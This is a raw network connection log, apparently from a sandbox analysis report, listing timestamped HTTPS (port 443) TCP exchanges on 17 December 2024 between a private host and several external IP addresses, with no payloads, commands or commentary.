                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.033490896 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.033865929 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.033931971 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.034101963 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.034110069 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.089884996 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.225640059 CET44349798104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.226001978 CET49798443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.226028919 CET44349798104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.226368904 CET44349798104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.226687908 CET49798443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.226756096 CET44349798104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.226851940 CET49798443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.267332077 CET44349798104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.483100891 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.483629942 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.483659983 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.483679056 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.483706951 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.483752012 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.484575987 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.491432905 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.491486073 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.491494894 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.499996901 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.500040054 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.500041008 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.500052929 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.500093937 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.603116989 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.607100964 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.607167959 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.607193947 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.647943974 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.675266027 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.682641983 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.682699919 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.682719946 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.685280085 CET44349798104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.685350895 CET44349798104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.685406923 CET49798443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.686144114 CET49798443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.686173916 CET44349798104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.689265013 CET49800443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.689301968 CET44349800104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.689378023 CET49800443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.689624071 CET49800443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.689631939 CET44349800104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.690964937 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.691015959 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.691031933 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.698653936 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.698703051 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.698712111 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.706420898 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.706474066 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.706489086 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.714494944 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.714545965 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.714562893 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.730515003 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.730588913 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.730587006 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.730608940 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.730644941 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.737032890 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.744594097 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.744641066 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.744646072 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.744664907 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.744723082 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.750740051 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.758169889 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.758233070 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.758251905 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.807909966 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.807923079 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.855911016 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.867382050 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.869467974 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.869519949 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.869535923 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.874430895 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.874541998 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.874550104 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.879168034 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.879215002 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.879221916 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.887660027 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.887720108 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.887747049 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.887784958 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.896054029 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.896065950 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.896131039 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.896214962 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.896261930 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.904752970 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.904762983 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.904827118 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.913136959 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.913150072 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.913201094 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.917460918 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.917531967 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.925950050 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.926011086 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.934429884 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.934499025 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.943006039 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.943087101 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.947246075 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.947305918 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.955667019 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.955735922 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.962315083 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.962372065 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.970557928 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:05.970624924 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.060960054 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.061024904 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.061058044 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.061084986 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.061109066 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.061111927 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.061184883 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.061285019 CET49797443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.061299086 CET44349797104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.066097021 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.066143036 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.068799973 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.068907022 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.068918943 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.082103014 CET49778443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.127321005 CET44349778172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.214467049 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.214534998 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.214696884 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.214927912 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.214941025 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.442414045 CET44349778172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.442504883 CET44349778172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.442765951 CET49778443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.444619894 CET49778443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.444650888 CET44349778172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.584638119 CET49803443192.168.2.1835.190.80.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.584733009 CET4434980335.190.80.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.585536003 CET49803443192.168.2.1835.190.80.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.585942030 CET49803443192.168.2.1835.190.80.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.585973024 CET4434980335.190.80.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.925661087 CET44349800104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.926052094 CET49800443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.926064968 CET44349800104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.926356077 CET44349800104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.928153038 CET49800443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.928206921 CET44349800104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.928457022 CET49800443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:06.975330114 CET44349800104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.317646027 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.318113089 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.318140030 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.318485022 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.319474936 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.319566965 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.319675922 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.363334894 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.373769999 CET44349800104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.373859882 CET44349800104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.373917103 CET49800443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.374654055 CET49800443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.374672890 CET44349800104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.455538988 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.455873966 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.455889940 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.456209898 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.456669092 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.456727982 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.456993103 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.457051039 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.457068920 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.795620918 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.798676968 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.798718929 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.798742056 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.798747063 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.798775911 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.798798084 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.807102919 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.807173967 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.807200909 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.808793068 CET4434980335.190.80.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.809068918 CET49803443192.168.2.1835.190.80.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.809103966 CET4434980335.190.80.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.810147047 CET4434980335.190.80.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.810221910 CET49803443192.168.2.1835.190.80.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.811400890 CET49803443192.168.2.1835.190.80.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.811527014 CET4434980335.190.80.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.811603069 CET49803443192.168.2.1835.190.80.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.811609983 CET4434980335.190.80.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.815411091 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.815464020 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.815490961 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.860920906 CET49803443192.168.2.1835.190.80.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.860934019 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.860968113 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.908910990 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.915846109 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.919523954 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.919590950 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.919617891 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.962459087 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.962507010 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.962583065 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.962615967 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.962879896 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.962924004 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.962934971 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.964222908 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.964277029 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.964287996 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.970737934 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.970812082 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.970843077 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.971906900 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.979593039 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.979662895 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.979697943 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.987356901 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.993031025 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.993093014 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:07.993128061 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.001673937 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.001734972 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.001761913 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.007929087 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.007997036 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.008022070 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.020008087 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.020036936 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.024061918 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.024110079 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.024132967 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.024166107 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.024266958 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.032212019 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.040764093 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.040807009 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.040834904 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.040864944 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.040935993 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.048583031 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.056783915 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.056900978 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.056927919 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.063607931 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.063839912 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.063863039 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.068701029 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.069278002 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.069493055 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.069505930 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.082597017 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.115977049 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.116010904 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.134097099 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.155936003 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.162265062 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.166038036 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.166060925 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.166083097 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.167567015 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.167700052 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.167711020 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.174098015 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.174339056 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.174361944 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.179511070 CET44349801104.18.95.41192.168.2.18
